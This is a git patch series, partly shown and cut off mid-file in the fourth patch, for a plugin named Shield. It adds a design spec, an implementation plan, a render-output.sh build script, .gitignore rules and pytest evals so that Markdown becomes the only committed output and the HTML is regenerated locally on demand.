From bc4546f8fdc9d3b5f4a9e2312f24cbb5f2d713a7 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 13:29:34 +0530
Subject: [PATCH 01/10] =?UTF-8?q?docs(spec):=20single=20canonical=20Shield?=
 =?UTF-8?q?=20output=20=E2=80=94=20Markdown=20source,=20HTML=20as=20build?=
 =?UTF-8?q?=20artifact?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Design spec: Markdown is the one committed/authored output; HTML + site
assets become local, gitignored build artifacts regenerated on demand by a
render-output.sh build script, triggered by a thin /shield render command.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 ...8-shield-single-canonical-output-design.md | 150 ++++++++++++++++++
 1 file changed, 150 insertions(+)
 create mode 100644 docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md

diff --git a/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md
new file mode 100644
index 00000000..54fc0d6d
--- /dev/null
+++ b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md
@@ -0,0 +1,150 @@
+# Shield: one canonical output (Markdown), HTML as a build artifact
+
+**Date:** 2026-06-08
+**Status:** Approved (design) — pending spec review
+**Scope:** Shield plugin output artifacts (`docs/shield/`)
+
+## Problem
+
+Shield writes every artifact twice and commits both:
+
+- `docs/shield/{feature}/*.md` — the authored Markdown
+- `docs/shield/{feature}/outputs/**/*.html` — an HTML mirror, plus generated
+  site assets at the `docs/shield/` root (`index.html`, `manifest.js`,
+  `shield.css`, `shield-nav.js`, `shield-dashboard.js`)
+
+Today 41 HTML files are tracked in git alongside their Markdown. This is
+confusing and wasteful because the HTML carries **no unique information** — it
+is rendered purely from Markdown by `shield/scripts/render-markdown.sh`. The
+real dependency chain is one-way:
+
+```
+JSON sidecar (plan.json, prd.meta.json)   ← structured source of truth
+        ↓ authored or rendered
+Markdown (.md)                            ← canonical human deliverable
+        ↓ render-markdown.sh (pure render)
+HTML (.html) + site assets                ← view-only, regenerable
+```
+
+Committing both means: two parallel trees that must stay in sync, doubled diffs
+on every change, and a standing drift risk (hand-edited HTML, or stale HTML).
+
+## Decision
+
+**Markdown is the single canonical, committed, authored output.** HTML is
+demoted to a **local build artifact** — generated on demand, never committed,
+treated like `dist/`.
+
+Chosen over two alternatives:
+
+- **Keep both committed + CI drift-guard** — rejected; keeps the double tree and
+  doubled diffs, only papers over the smell.
+- **Drop HTML entirely** — rejected; the browsable dashboard (nav, Mermaid,
+  cross-linking) is the real consumer.
+
+Confirmed constraint: people open the HTML **locally** in a browser. Nothing
+hosts/serves the committed `outputs/` tree, so gitignoring HTML costs only a
+"build before you browse" step.
+
+## Design
+
+### 1. What stays committed vs. ignored
+
+**Committed (canonical / source):**
+- All `*.md` under `docs/shield/`
+- All JSON sidecars: `manifest.json`, `plan.json`, `*.meta.json`,
+  `*-comments.json`, `grades.json`
+
+**Gitignored (generated, regenerable):**
+- `docs/shield/**/outputs/` — every rendered per-artifact HTML tree
+- `docs/shield/index.html`
+- `docs/shield/manifest.js`
+- `docs/shield/shield.css`, `docs/shield/shield-nav.js`,
+  `docs/shield/shield-dashboard.js`
+
+Note: `manifest.json` stays committed (it is the index source); `manifest.js`
+is a generated JS mirror and is ignored.
+
+### 2. Remove already-committed HTML
+
+`git rm --cached` the 41 tracked `.html` files plus the tracked root site
+assets (`docs/shield/index.html`, `docs/shield/manifest.js`). Add the
+`.gitignore` rules above in the same commit so they don't reappear.
+
+### 3. Renderers are unchanged
+
+Skills keep calling `render-markdown.sh` and `write_shield_assets.py` exactly as
+they do now. The only difference is the output lands in a gitignored location,
+so it never enters a diff. **No renderer code changes.**
+
+### 4. Build script + thin command trigger
+
+Two pieces, clearly separated:
+
+**A. The build script — `shield/scripts/render-output.sh`** (the orchestrator).
+This is where all the conversion logic lives. Given an optional feature, it
+regenerates the full HTML site from committed Markdown + `manifest.json`:
+
+- No feature arg → rebuild the whole `docs/shield/` site (every feature's
+  `outputs/*.html` + the root dashboard `index.html` and assets).
+- With a feature arg → rebuild just that feature's `outputs/` + refresh the
+  root dashboard/manifest assets.
+
+It is a thin wrapper that drives the **existing** machinery — it loops the
+relevant `.md` files through `render-markdown.sh` and then calls
+`write_shield_assets.py`. It introduces **no new renderer**. Being a standalone
+script, it is runnable and testable on its own (which the eval relies on).
+
+**B. The command — `/shield render [feature]`** (skill). A thin trigger that
+just invokes `render-output.sh [feature]` and reports where the built site is.
+No conversion logic in the command itself.
+
+This is the "build before you browse / share" entry point, run on demand.
+
+### 5. Skill prose / path references
+
+Audit the authoring skills (`research`, `prd-docs`, `plan-docs`, `lld-docs`,
+`prd-review`, `plan-review`, `review`) and the `output-paths.yaml` registry for
+any language that presents the `.html`/`outputs/` paths as *committed
+deliverables*. Update them to describe HTML as a local build artifact and point
+users at `/shield render` to view. Markdown paths remain the deliverables they
+report.
+
+## Out of scope (YAGNI)
+
+- New export formats (PDF, Confluence). Markdown-as-source makes these easy
+  later, but none are built now.
+- Hosting/serving the dashboard. Local-open only.
+- Changing the renderer, shell template, or dashboard behavior.
+- Touching the JSON sidecar schemas.
+
+## Risks / notes
+
+- **Existing clones with committed HTML:** after this lands, `git rm --cached`
+  leaves their working-tree HTML in place but now ignored; harmless. Fresh
+  clones simply won't have HTML until they run `/shield render`.
+- **"I opened a stale/missing HTML":** mitigated by the explicit `/shield
+  render` step and by the fact that rendering is cheap and idempotent.
+
+## Eval coverage (per CLAUDE.md — mandatory for plugin asset changes)
+
+This touches plugin assets (new `/shield render` command + skill-prose edits),
+so the PR must ship at least one executable eval. Candidate coverage:
+
+- An eval that runs `render-output.sh` directly against a fixture feature with
+  committed `.md` + `manifest.json` and asserts the expected `outputs/*.html`,
+  root `index.html`, and assets are produced (and match a render of the
+  Markdown). Testing the script directly avoids going through the command layer.
+- A repo-hygiene check (eval or test) asserting no `*.html` / generated site
+  assets are tracked under `docs/shield/` and that the `.gitignore` rules cover
+  them.
+
+## Definition of done
+
+1. `.gitignore` updated; 41 `.html` + root site assets untracked.
+2. `render-output.sh` build script added (wraps existing renderers); `/shield
+   render` command added as a thin trigger.
+3. Skill prose + `output-paths.yaml` updated to call HTML a build artifact.
+4. Eval(s) above land in the same PR; RED→GREEN paper trail recorded.
+5. Plugin version bumped in `.claude-plugin/marketplace.json` (and
+   `pyproject.toml` if applicable).

From 1ee3eab00f63a47f6f6f7a09c336be11c5aff6b1 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 13:45:10 +0530
Subject: [PATCH 02/10] docs(plan): implementation plan for single canonical
 Shield output

Six tasks: complete rerender_all coverage (enhanced-*/detailed/*), add
render-output.sh build script, /shield render command, gitignore+untrack HTML,
prose updates, version bump. Each task is TDD with an executable eval.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 ...26-06-08-shield-single-canonical-output.md | 511 ++++++++++++++++++
 1 file changed, 511 insertions(+)
 create mode 100644 docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md

diff --git a/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md
new file mode 100644
index 00000000..08a7c49f
--- /dev/null
+++ b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md
@@ -0,0 +1,511 @@
+# Shield Single Canonical Output Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Make Markdown the single committed Shield output and demote HTML to a locally-built, gitignored artifact regenerated on demand by one build script.
+
+**Architecture:** Reuse the existing renderers. First make the existing `rerender_all.py` *complete* so it regenerates every HTML we currently commit (main docs, review summaries, **and** the `enhanced-*` / `detailed/*` reviewer docs it currently skips). Add a thin `render-output.sh` that runs `rerender_all.py` (pages) then `write_shield_assets.py` (dashboard + assets). Add a `/shield render` command that just triggers the script. Then `.gitignore` all generated HTML/site assets and `git rm --cached` the 41 already-tracked HTML files + root assets. Finally update path-registry/CLAUDE.md prose to call HTML a build artifact.
+
+**Tech Stack:** Bash + Python 3 (stdlib only for orchestration), `uv` for the markdown-it render dependency, `pytest` for evals. All under `shield/scripts/`.
+
+---
+
+## Spec
+
+Design doc: `docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md`
+
+## File Structure
+
+**Modify:**
+- `shield/scripts/rerender_all.py` — extend `rerender_all()` to also render `enhanced-*.md` and `detailed/*.md` review sources. Stays page-rendering only (single responsibility).
+- `.gitignore` — add rules for generated HTML + root site assets.
+- `shield/schema/output-paths.yaml` — header note: `*_html` paths are local build artifacts.
+- `CLAUDE.md` — the artifact-output note (currently says "Rendered HTML lands under …") gains "(build artifact — gitignored; run `/shield render`)".
+
+**Create:**
+- `shield/scripts/render-output.sh` — the build script (orchestrator): `rerender_all.py` + `write_shield_assets.py`.
+- `shield/commands/render.md` — `/shield render` command (thin trigger).
+- `shield/scripts/test_rerender_all.py` — eval: completeness of rendered set.
+- `shield/scripts/test_render_output.py` — eval: end-to-end build produces pages **and** assets.
+- `shield/scripts/test_gitignore_html_artifacts.py` — eval: `.gitignore` covers the generated artifacts.
+
+**Remove from git (keep on disk):**
+- 41 tracked `*.html` under `docs/shield/**/outputs/`, plus `docs/shield/index.html` and `docs/shield/manifest.js`.
+
+---
+
+## Task 1: Make `rerender_all.py` render the complete HTML set
+
+Today `rerender_all.py` renders the five main docs + `reviews/*/*/summary.md` only. It silently skips `enhanced-*.md` and `detailed/*.md`, which ARE committed as HTML today. Fix that so nothing is lost when we stop committing HTML.
+
+**Files:**
+- Create: `shield/scripts/test_rerender_all.py`
+- Modify: `shield/scripts/rerender_all.py` (the `rerender_all` function body, after the existing `summary.md` loop)
+
+- [ ] **Step 1: Write the failing test**
+
+Create `shield/scripts/test_rerender_all.py`:
+
+```python
+"""Eval for rerender_all.py — renders the COMPLETE committed HTML set,
+including enhanced-* and detailed/* review docs (regression: those were skipped)."""
+from __future__ import annotations
+
+import importlib.util
+import json
+import subprocess
+from pathlib import Path
+
+SPEC = Path(__file__).resolve().parent / "rerender_all.py"
+_spec = importlib.util.spec_from_file_location("rerender_all", SPEC)
+ra = importlib.util.module_from_spec(_spec)
+_spec.loader.exec_module(ra)
+
+
+def _fixture(root: Path) -> None:
+    """A feature with a main doc + a plan review that has summary, enhanced, detailed."""
+    feat = root / "feat-x"
+    (feat).mkdir(parents=True)
+    (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []}))
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+    rev = feat / "reviews" / "plan" / "2026-06-08"
+    (rev / "detailed").mkdir(parents=True)
+    (rev / "summary.md").write_text("# Summary\n\nbody\n")
+    (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n")
+    (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n")
+
+
+def test_renders_enhanced_and_detailed(tmp_path):
+    _fixture(tmp_path)
+    rc = ra.rerender_all(tmp_path)
+    assert rc == 0
+    out = tmp_path / "feat-x" / "outputs"
+    expected = [
+        out / "prd.html",
+        out / "reviews" / "plan" / "2026-06-08" / "summary.html",
+        out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html",
+        out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html",
+    ]
+    for p in expected:
+        assert p.is_file(), f"missing rendered page: {p}"
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v`
+Expected: FAIL — `enhanced-plan.html` and `detailed/agile-coach.html` are missing (rerender_all skips them today).
+
+- [ ] **Step 3: Add the enhanced + detailed render loops**
+
+In `shield/scripts/rerender_all.py`, inside `rerender_all()`, immediately AFTER this existing block:
+
+```python
+        for summary in feature.glob("reviews/*/*/summary.md"):
+            rel = summary.relative_to(feature).with_suffix(".html")
+            _render(summary, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+```
+
+add:
+
+```python
+        for enhanced in feature.glob("reviews/*/*/enhanced-*.md"):
+            rel = enhanced.relative_to(feature).with_suffix(".html")
+            _render(enhanced, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+        for detailed in feature.glob("reviews/*/*/detailed/*.md"):
+            rel = detailed.relative_to(feature).with_suffix(".html")
+            _render(detailed, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+```
+
+- [ ] **Step 4: Run test to verify it passes**
+
+Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add shield/scripts/rerender_all.py shield/scripts/test_rerender_all.py
+git commit -m "fix(shield): rerender_all renders enhanced-* and detailed/* review docs"
+```
+
+---
+
+## Task 2: Create `render-output.sh` build script
+
+The orchestrator the user asked for: renders all pages, then writes the dashboard + shared assets. Idempotent.
+
+**Files:**
+- Create: `shield/scripts/render-output.sh`
+- Create: `shield/scripts/test_render_output.py`
+
+- [ ] **Step 1: Write the failing test**
+
+Create `shield/scripts/test_render_output.py`:
+
+```python
+"""Eval for render-output.sh — the full build: pages + dashboard assets."""
+from __future__ import annotations
+
+import json
+import subprocess
+from pathlib import Path
+
+SCRIPT = Path(__file__).resolve().parent / "render-output.sh"
+
+
+def test_build_produces_pages_and_assets(tmp_path):
+    feat = tmp_path / "feat-x"
+    feat.mkdir(parents=True)
+    (tmp_path / "manifest.json").write_text(
+        json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]})
+    )
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+
+    res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True)
+    assert res.returncode == 0, res.stderr
+
+    # pages
+    assert (feat / "outputs" / "prd.html").is_file()
+    # dashboard + shared assets
+    for asset in ["manifest.js", "index.html", "shield.css",
+                  "shield-nav.js", "shield-dashboard.js"]:
+        assert (tmp_path / asset).is_file(), f"missing asset {asset}"
+
+
+def test_missing_dir_errors(tmp_path):
+    res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")],
+                         capture_output=True, text=True)
+    assert res.returncode == 2
+    assert "not a dir" in res.stderr
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v`
+Expected: FAIL — `render-output.sh` does not exist yet.
+
+- [ ] **Step 3: Write the build script**
+
+Create `shield/scripts/render-output.sh`:
+
+```bash
+#!/usr/bin/env bash
+# Build the full Shield HTML site from committed Markdown.
+#
+# Step 1: render every source .md to its outputs/*.html (rerender_all.py)
+# Step 2: write the dashboard + shared assets (write_shield_assets.py)
+#
+# HTML is a build artifact: it is gitignored and regenerated on demand.
+# Markdown + JSON sidecars are the committed source of truth.
+#
+# Usage:
+#   render-output.sh [OUTPUT_DIR]
+#     OUTPUT_DIR defaults to <repo-root>/docs/shield
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+OUTPUT_DIR="${1:-}"
+if [[ -z "$OUTPUT_DIR" ]]; then
+  ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
+  OUTPUT_DIR="$ROOT/docs/shield"
+fi
+
+if [[ ! -d "$OUTPUT_DIR" ]]; then
+  echo "render-output: not a dir: $OUTPUT_DIR" >&2
+  exit 2
+fi
+
+python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR"
+python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR"
+echo "render-output: site built at $OUTPUT_DIR"
+```
+
+- [ ] **Step 4: Make it executable**
+
+Run: `chmod +x shield/scripts/render-output.sh`
+Expected: no output (the repo's pre-commit "scripts with shebangs are executable" hook requires this).
+
+- [ ] **Step 5: Run test to verify it passes**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v`
+Expected: PASS (both tests)
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add shield/scripts/render-output.sh shield/scripts/test_render_output.py
+git commit -m "feat(shield): render-output.sh — one build script for the HTML site"
+```
+
+---
+
+## Task 3: Add the `/shield render` command
+
+A thin trigger. No logic — it invokes `render-output.sh`.
+
+**Files:**
+- Create: `shield/commands/render.md`
+
+- [ ] **Step 1: Write the command**
+
+Create `shield/commands/render.md` (mirrors the frontmatter style of `shield/commands/analyze-plan.md`):
+
+```markdown
+---
+name: render
+description: Build the browsable Shield HTML site locally from committed Markdown
+args: "[output dir — optional, defaults to docs/shield]"
+---
+
+# Render Shield Output
+
+Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the
+browsable dashboard) is a **local build artifact** — gitignored and regenerated
+on demand. Run this command to (re)build the site, then open the HTML locally.
+
+## Usage
+
+`/shield render` — rebuild the whole site under `docs/shield/`
+`/shield render <output dir>` — rebuild a site rooted at a custom dir
+
+## Behavior
+
+1. Run the build script, which renders every source `.md` to its
+   `outputs/*.html` and then writes the dashboard (`index.html`) and shared
+   assets (`manifest.js`, CSS, nav JS):
+
+   ```bash
+   "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS"
+   ```
+
+   (`$ARGUMENTS` is empty for the default `docs/shield/` location.)
+
+2. Report the built site path and remind the user the output is gitignored —
+   open `docs/shield/index.html` in a browser to view.
+
+## Important
+
+- This command does NOT author or modify any Markdown — it only renders.
+- HTML is never committed; do not `git add` anything under `outputs/` or the
+  generated root assets.
+```
+
+- [ ] **Step 2: Verify the command file parses (frontmatter present)**
+
+Run: `head -6 shield/commands/render.md`
+Expected: shows the `---` frontmatter block with `name: render`.
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add shield/commands/render.md
+git commit -m "feat(shield): /shield render command triggers render-output.sh"
+```
+
+---
+
+## Task 4: Gitignore generated HTML and untrack the committed files
+
+**Files:**
+- Modify: `.gitignore`
+- Create: `shield/scripts/test_gitignore_html_artifacts.py`
+- Remove from index: tracked `*.html` + root assets under `docs/shield/`
+
+- [ ] **Step 1: Write the failing hygiene test**
+
+Create `shield/scripts/test_gitignore_html_artifacts.py`:
+
+```python
+"""Eval: .gitignore demotes Shield HTML to a build artifact."""
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]  # repo root
+GITIGNORE = ROOT / ".gitignore"
+
+REQUIRED_PATTERNS = [
+    "**/docs/shield/*/outputs/",
+    "**/docs/shield/index.html",
+    "**/docs/shield/manifest.js",
+]
+
+
+def test_gitignore_has_html_artifact_rules():
+    text = GITIGNORE.read_text()
+    for pat in REQUIRED_PATTERNS:
+        assert pat in text, f".gitignore missing rule: {pat}"
+
+
+def test_no_shield_html_tracked():
+    out = subprocess.run(
+        ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"],
+        cwd=ROOT, capture_output=True, text=True,
+    )
+    tracked = [l for l in out.stdout.splitlines() if l.strip()]
+    assert tracked == [], f"HTML/assets still tracked: {tracked}"
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v`
+Expected: FAIL — patterns absent and 41+ HTML files still tracked.
+
+- [ ] **Step 3: Add the `.gitignore` rules**
+
+Append to `.gitignore` (after the existing `**/docs/shield/*/.session-transcript.md` block):
+
+```gitignore
+# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are
+# the committed source of truth. Regenerate the site locally with /shield
+# render (scripts/render-output.sh). See docs/superpowers/specs/
+# 2026-06-08-shield-single-canonical-output-design.md
+**/docs/shield/*/outputs/
+**/docs/shield/index.html
+**/docs/shield/manifest.js
+**/docs/shield/shield.css
+**/docs/shield/shield-nav.js
+**/docs/shield/shield-dashboard.js
+```
+
+- [ ] **Step 4: Untrack the already-committed HTML + root assets (keep on disk)**
+
+Run:
+
+```bash
+git ls-files -z \
+  'docs/shield/*/outputs/**' \
+  'docs/shield/index.html' \
+  'docs/shield/manifest.js' \
+  'docs/shield/shield.css' \
+  'docs/shield/shield-nav.js' \
+  'docs/shield/shield-dashboard.js' \
+  | xargs -0 --no-run-if-empty git rm --cached --quiet
+```
+
+Expected: lists the removed paths (≈41 html + index.html + manifest.js). Files remain on disk; only the index entries are dropped.
+
+- [ ] **Step 5: Run test to verify it passes**
+
+Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v`
+Expected: PASS (both tests)
+
+- [ ] **Step 6: Verify the build still reproduces what was removed**
+
+Run: `shield/scripts/render-output.sh` then `git status --porcelain docs/shield | grep -c '\.html$' || true`
+Expected: `0` — regenerated HTML is ignored (not showing as untracked), proving the build replaces the removed committed files.
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add .gitignore shield/scripts/test_gitignore_html_artifacts.py
+git commit -m "build(shield): gitignore HTML build artifacts; untrack committed HTML"
+```
+
+---
+
+## Task 5: Update path-registry + artifact-output prose
+
+Stop describing HTML as a committed deliverable; point readers at `/shield render`. The "Rendered HTML lands under …" phrasing lives in exactly three places (confirmed by grep): `shield/hooks/scripts/session-start.sh`, `shield/docs/artifacts.md`, `shield/skills/general/manifest-schema.md`. The per-skill render steps still run unchanged — they just produce gitignored output.
+
+**Files:**
+- Modify: `shield/schema/output-paths.yaml` (top-of-file header comment)
+- Modify: `shield/hooks/scripts/session-start.sh`
+- Modify: `shield/docs/artifacts.md`
+- Modify: `shield/skills/general/manifest-schema.md`
+
+- [ ] **Step 1: Add a header note to `output-paths.yaml`**
+
+At the very top of `shield/schema/output-paths.yaml`, add (above the first existing line):
+
+```yaml
+# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and
+# regenerated on demand by /shield render (scripts/render-output.sh). The
+# committed source of truth is the corresponding Markdown (+ JSON sidecars).
+```
+
+- [ ] **Step 2: Inspect the three "Rendered HTML lands under" call-sites**
+
+Run: `grep -n "Rendered HTML lands under" shield/hooks/scripts/session-start.sh shield/docs/artifacts.md shield/skills/general/manifest-schema.md`
+Expected: one matching line per file. Read each line's surrounding sentence so the edit in Step 3 matches the exact existing text.
+
+- [ ] **Step 3: Append the build-artifact parenthetical in each of the three files**
+
+In each file, edit the sentence that begins "Rendered HTML lands under `docs/shield/{feature}/outputs/`" so it ends with the parenthetical. The target sentence must read:
+
+```
+Rendered HTML lands under `docs/shield/{feature}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`).
+```
+
+(Preserve each file's surrounding punctuation/markup; only insert the ` (build artifact — gitignored; rebuild locally with `/shield render`)` clause before the trailing period.)
+
+- [ ] **Step 4: Grep for any remaining "committed HTML" phrasing**
+
+Run: `grep -rniE "commit.*\.html|html.*deliverable" shield/ || echo "none"`
+Expected: `none` (no prose describing HTML as committed).
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add shield/schema/output-paths.yaml shield/hooks/scripts/session-start.sh \
+        shield/docs/artifacts.md shield/skills/general/manifest-schema.md
+git commit -m "docs(shield): describe HTML output as a gitignored build artifact"
+```
+
+---
+
+## Task 6: Version bump
+
+Per CLAUDE.md: bump the plugin version in `marketplace.json` for any plugin change. Shield has no root `pyproject.toml` (only `shield/backlog/` and `shield/parsers/` have them, untouched here), so only `marketplace.json` changes.
+
+**Files:**
+- Modify: `.claude-plugin/marketplace.json` (shield `version`)
+
+- [ ] **Step 1: Bump shield version**
+
+In `.claude-plugin/marketplace.json`, change the `shield` entry `"version": "2.27.0"` to `"version": "2.28.0"` (minor bump — new command + behavior change).
+
+- [ ] **Step 2: Verify JSON is valid**
+
+Run: `python3 -m json.tool .claude-plugin/marketplace.json > /dev/null && echo OK`
+Expected: `OK`
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add .claude-plugin/marketplace.json
+git commit -m "chore(shield): bump to 2.28.0 — Markdown-canonical output + /shield render"
+```
+
+---
+
+## Final verification (run before opening PR)
+
+- [ ] **Run the full new eval set:**
+
+Run:
+```bash
+cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" \
+  pytest test_rerender_all.py test_render_output.py test_gitignore_html_artifacts.py -v
+```
+Expected: all PASS.
+
+- [ ] **Confirm no HTML is tracked and the build regenerates cleanly:**
+
+Run:
+```bash
+git ls-files 'docs/shield/**/*.html' | wc -l   # expect 0
+shield/scripts/render-output.sh
+git status --porcelain docs/shield | grep '\.html$' || echo "clean (html ignored)"
+```
+Expected: `0`, then `clean (html ignored)`.
+
+- [ ] **PR body notes:** the `/shield render` command is a thin trigger fully exercised by `test_render_output.py`; completeness regression covered by `test_rerender_all.py`; repo hygiene by `test_gitignore_html_artifacts.py`. No `pyproject.toml` bump (shield root has none).

From 72b3596680281ff76783978b83e1c8b23ff4086e Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:25:05 +0000
Subject: [PATCH 03/10] fix(shield): rerender_all renders enhanced-* and
 detailed/* review docs

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 shield/scripts/rerender_all.py      | 10 +++++++
 shield/scripts/test_rerender_all.py | 41 +++++++++++++++++++++++++++++
 2 files changed, 51 insertions(+)
 create mode 100644 shield/scripts/test_rerender_all.py

diff --git a/shield/scripts/rerender_all.py b/shield/scripts/rerender_all.py
index b1f82783..b2890d86 100755
--- a/shield/scripts/rerender_all.py
+++ b/shield/scripts/rerender_all.py
@@ -50,6 +50,16 @@ def rerender_all(output_dir: Path) -> int:
             _render(summary, feature / "outputs" / rel,
                     f"Review — {feature.name}", output_dir)
             count += 1
+        for enhanced in feature.glob("reviews/*/*/enhanced-*.md"):
+            rel = enhanced.relative_to(feature).with_suffix(".html")
+            _render(enhanced, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
+        for detailed in feature.glob("reviews/*/*/detailed/*.md"):
+            rel = detailed.relative_to(feature).with_suffix(".html")
+            _render(detailed, feature / "outputs" / rel,
+                    f"Review — {feature.name}", output_dir)
+            count += 1
     print(f"rerender_all: rendered {count} page(s)")
     return 0
 
diff --git a/shield/scripts/test_rerender_all.py b/shield/scripts/test_rerender_all.py
new file mode 100644
index 00000000..b85fb333
--- /dev/null
+++ b/shield/scripts/test_rerender_all.py
@@ -0,0 +1,41 @@
+"""Eval for rerender_all.py — renders the COMPLETE committed HTML set,
+including enhanced-* and detailed/* review docs (regression: those were skipped)."""
+from __future__ import annotations
+
+import importlib.util
+import json
+import subprocess
+from pathlib import Path
+
+SPEC = Path(__file__).resolve().parent / "rerender_all.py"
+_spec = importlib.util.spec_from_file_location("rerender_all", SPEC)
+ra = importlib.util.module_from_spec(_spec)
+_spec.loader.exec_module(ra)
+
+
+def _fixture(root: Path) -> None:
+    """A feature with a main doc + a plan review that has summary, enhanced, detailed."""
+    feat = root / "feat-x"
+    (feat).mkdir(parents=True)
+    (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []}))
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+    rev = feat / "reviews" / "plan" / "2026-06-08"
+    (rev / "detailed").mkdir(parents=True)
+    (rev / "summary.md").write_text("# Summary\n\nbody\n")
+    (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n")
+    (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n")
+
+
+def test_renders_enhanced_and_detailed(tmp_path):
+    _fixture(tmp_path)
+    rc = ra.rerender_all(tmp_path)
+    assert rc == 0
+    out = tmp_path / "feat-x" / "outputs"
+    expected = [
+        out / "prd.html",
+        out / "reviews" / "plan" / "2026-06-08" / "summary.html",
+        out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html",
+        out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html",
+    ]
+    for p in expected:
+        assert p.is_file(), f"missing rendered page: {p}"

From 8a8dc6534e11d9466ac8d72b593fe3ea897cecbf Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:25:40 +0000
Subject: [PATCH 04/10] =?UTF-8?q?feat(shield):=20render-output.sh=20?=
 =?UTF-8?q?=E2=80=94=20one=20build=20script=20for=20the=20HTML=20site?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 shield/scripts/render-output.sh      | 30 ++++++++++++++++++++++++
 shield/scripts/test_render_output.py | 34 ++++++++++++++++++++++++++++
 2 files changed, 64 insertions(+)
 create mode 100755 shield/scripts/render-output.sh
 create mode 100644 shield/scripts/test_render_output.py

diff --git a/shield/scripts/render-output.sh b/shield/scripts/render-output.sh
new file mode 100755
index 00000000..fd4d0ae5
--- /dev/null
+++ b/shield/scripts/render-output.sh
@@ -0,0 +1,30 @@
+#!/usr/bin/env bash
+# Build the full Shield HTML site from committed Markdown.
+#
+# Step 1: render every source .md to its outputs/*.html (rerender_all.py)
+# Step 2: write the dashboard + shared assets (write_shield_assets.py)
+#
+# HTML is a build artifact: it is gitignored and regenerated on demand.
+# Markdown + JSON sidecars are the committed source of truth.
+#
+# Usage:
+#   render-output.sh [OUTPUT_DIR]
